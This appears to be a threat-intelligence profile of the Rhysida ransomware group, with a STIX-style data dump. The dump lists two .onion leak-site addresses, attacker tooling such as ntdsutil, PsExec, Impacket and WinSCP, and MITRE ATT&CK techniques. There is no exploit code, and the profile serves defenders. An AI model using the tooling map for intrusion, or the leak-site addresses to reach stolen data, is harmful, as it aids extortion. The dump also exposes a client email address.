Threat Actor Profile
High
Cybercriminal
Description
Rhysida is a ransomware-as-a-service (RAAS) group that emerged in May 2023. The group utilizes a namesake ransomware through phishing attacks and Cobalt Strike to breach the targets' networks and deploy their payloads. The group threatens to publicly distribute exfiltrated data if the ransom is not paid, and it's worth mentioning that Rhysida is still in the early stages of development. The ransomware leaves PDF notes in the affected folders, instructing victims to contact the group through its portal, and payment is made via Bitcoin. After encryption, the ransomware appends the extension '.ryshida' to encrypted files. Source: https://github.com/crocodyli/ThreatActors-TTPs
Confidence Score
Tags
ransomware
ransomware.live
First Seen
Unknown
Last Updated
Unknown
Active Status
ActiveCreated
April 29, 2026
MITRE ATT&CK Techniques (28)
Indicators of Compromise
Loading IOCs…
IOC KQL for Sentinel
STIX Data
{'added_date': None,
'client': '2003264@sit.singaporetech.edu.sg',
'description': 'Rhysida is a ransomware-as-a-service (RAAS) group that '
'emerged in May 2023. The group utilizes a namesake ransomware '
'through phishing attacks and Cobalt Strike to breach the '
"targets' networks and deploy their payloads.<br> <br> The "
'group threatens to publicly distribute exfiltrated data if '
"the ransom is not paid, and it's worth mentioning that "
'Rhysida is still in the early stages of development.<br> <br> '
'The ransomware leaves PDF notes in the affected folders, '
'instructing victims to contact the group through its portal, '
'and payment is made via Bitcoin.<br> <br> After encryption, '
"the ransomware appends the extension '.ryshida' to encrypted "
'files.<BR>Source: '
'https://github.com/crocodyli/ThreatActors-TTPs',
'firstseen': '2023-06-05T11:25:22.945172+00:00',
'group': 'rhysida',
'has_negotiations': False,
'has_ransomnote': True,
'lastseen': '2026-04-27T15:35:49.961778+00:00',
'locations': [{'available': True,
'fqdn': 'rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion',
'slug': 'http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/archive.php?auction',
'title': '',
'type': 'DLS'},
{'available': True,
'fqdn': 'rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'slug': 'http://rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'title': 'Rhysida',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 1,
'tiaras_metadata': {'has_negotiations': False,
'has_ransomnote': True,
'locations': [{'available': True,
'fqdn': 'rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion',
'slug': 'http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/archive.php?auction',
'title': '',
'type': 'DLS'},
{'available': True,
'fqdn': 'rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'slug': 'http://rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'title': 'Rhysida',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 1,
'ransomware_live_group': 'rhysida',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['PowerView'],
'Exfiltration': ['WinSCP'],
'LOLBAS': ['NTDS Utility (ntdsutil)',
'PsExec',
'Windows Event Utility (wevtutil)',
'WMIC'],
'Networking': [],
'Offsec': ['Impacket'],
'RMM-Tools': ['AnyDesk']},
'url': 'https://www.ransomware.live/group/rhysida',
'victims': 269,
'vulnerabilities': []},
'tiaras_source': 'ransomware.live',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['PowerView'],
'Exfiltration': ['WinSCP'],
'LOLBAS': ['NTDS Utility (ntdsutil)',
'PsExec',
'Windows Event Utility (wevtutil)',
'WMIC'],
'Networking': [],
'Offsec': ['Impacket'],
'RMM-Tools': ['AnyDesk']},
'ttps': [{'tactic_id': 'TA0043',
'tactic_name': 'Reconnaissance',
'techniques': [{'technique_details': 'Scanning for vulnerable '
'targets.',
'technique_id': 'T1595',
'technique_name': 'Active Scanning'},
{'technique_details': 'Gathering information through '
'phishing.',
'technique_id': 'T1598',
'technique_name': 'Phishing for Information'}]},
{'tactic_id': 'TA0042',
'tactic_name': 'Resource Development',
'techniques': [{'technique_details': 'Acquiring infrastructure for '
'operations.',
'technique_id': 'T1583',
'technique_name': 'Acquire Infrastructure'},
{'technique_details': 'Developing malware '
'capabilities.',
'technique_id': 'T1587',
'technique_name': 'Develop Capabilities'}]},
{'tactic_id': 'TA0001',
'tactic_name': 'Initial Access',
'techniques': [{'technique_details': 'Phishing for initial access.',
'technique_id': 'T1566',
'technique_name': 'Phishing'},
{'technique_details': 'Bypassing UAC for access.',
'technique_id': 'T1548.002',
'technique_name': 'Abusing Elevation Control '
'Mechanism: Bypass User Account '
'Control'}]},
{'tactic_id': 'TA0002',
'tactic_name': 'Execution',
'techniques': [{'technique_details': 'Using command interpreters '
'for execution.',
'technique_id': 'T1059',
'technique_name': 'Command and Scripting '
'Interpreter'},
{'technique_details': 'Using shared modules.',
'technique_id': 'T1129',
'technique_name': 'Shared Modules'}]},
{'tactic_id': 'TA0003',
'tactic_name': 'Persistence',
'techniques': [{'technique_details': 'Persistence via registry run '
'keys.',
'technique_id': 'T1547.001',
'technique_name': 'Registry Run Keys / Startup '
'Folder'}]},
{'tactic_id': 'TA0004',
'tactic_name': 'Privilege Escalation',
'techniques': [{'technique_details': 'Injecting into processes for '
'privilege escalation.',
'technique_id': 'T1055',
'technique_name': 'Process Injection'},
{'technique_details': 'Hijacking thread execution.',
'technique_id': 'T1055.003',
'technique_name': 'Thread Execution Hijacking'},
{'technique_details': 'Using registry run keys.',
'technique_id': 'T1547.001',
'technique_name': 'Registry Run Keys'}]},
{'tactic_id': 'TA0005',
'tactic_name': 'Defense Evasion',
'techniques': [{'technique_details': 'Obfuscating files and '
'information.',
'technique_id': 'T1027',
'technique_name': 'Obfuscated Files or Information'},
{'technique_details': 'Masquerading malicious files.',
'technique_id': 'T1036',
'technique_name': 'Masquerading'},
{'technique_details': 'Process injection for '
'evasion.',
'technique_id': 'T1055',
'technique_name': 'Process Injection'},
{'technique_details': 'Thread execution hijacking.',
'technique_id': 'T1055.003',
'technique_name': 'Thread Execution Hijacking'},
{'technique_details': 'Evading '
'virtualization/sandbox '
'detection.',
'technique_id': 'T1497',
'technique_name': 'Virtualization/Sandbox Evasion'},
{'technique_details': 'Hiding artifacts.',
'technique_id': 'T1564',
'technique_name': 'Hidden Artifacts'},
{'technique_details': 'Using NTFS file attributes.',
'technique_id': 'T1564.004',
'technique_name': 'NTFS File Attributes'},
{'technique_details': 'Reflective DLL injection.',
'technique_id': 'T1620',
'technique_name': 'Reflective DLL Injection'}]},
{'tactic_id': 'TA0007',
'tactic_name': 'Discovery',
'techniques': [{'technique_details': 'Discovering application '
'windows.',
'technique_id': 'T1010',
'technique_name': 'Application Window Discovery'},
{'technique_details': 'Discovering running '
'processes.',
'technique_id': 'T1057',
'technique_name': 'Process Discovery'},
{'technique_details': 'Discovering system '
'information.',
'technique_id': 'T1082',
'technique_name': 'System Information Discovery'},
{'technique_details': 'Discovering files and '
'directories.',
'technique_id': 'T1083',
'technique_name': 'File and Directory Discovery'},
{'technique_details': 'Detecting '
'virtualization/sandbox.',
'technique_id': 'T1497',
'technique_name': 'Virtualization/Sandbox Evasion'},
{'technique_details': 'Discovering security '
'software.',
'technique_id': 'T1518.001',
'technique_name': 'Security Software Discovery'}]},
{'tactic_id': 'TA0009',
'tactic_name': 'Collection',
'techniques': [{'technique_details': 'Collecting data from local '
'system.',
'technique_id': 'T1005',
'technique_name': 'Data from Local System'},
{'technique_details': 'Automated data collection.',
'technique_id': 'T1119',
'technique_name': 'Automated Collection'}]},
{'tactic_id': 'TA0011',
'tactic_name': 'Command and Control',
'techniques': [{'technique_details': 'Using application layer '
'protocols.',
'technique_id': 'T1071',
'technique_name': 'Application Layer Protocol'},
{'technique_details': 'Using web protocols for C2.',
'technique_id': 'T1071.001',
'technique_name': 'Web Protocols'}]},
{'tactic_id': 'TA0010',
'tactic_name': 'Exfiltration',
'techniques': [{'technique_details': 'Exfiltrating data over C2 '
'channel.',
'technique_id': 'T1041',
'technique_name': 'Exfiltration Over C2 Channel'}]},
{'tactic_id': 'TA0040',
'tactic_name': 'Impact',
'techniques': [{'technique_details': 'Encrypting data for impact.',
'technique_id': 'T1486',
'technique_name': 'Data Encrypted for Impact'}]}],
'url': 'https://www.ransomware.live/group/rhysida',
'victims': 269,
'vulnerabilities': []}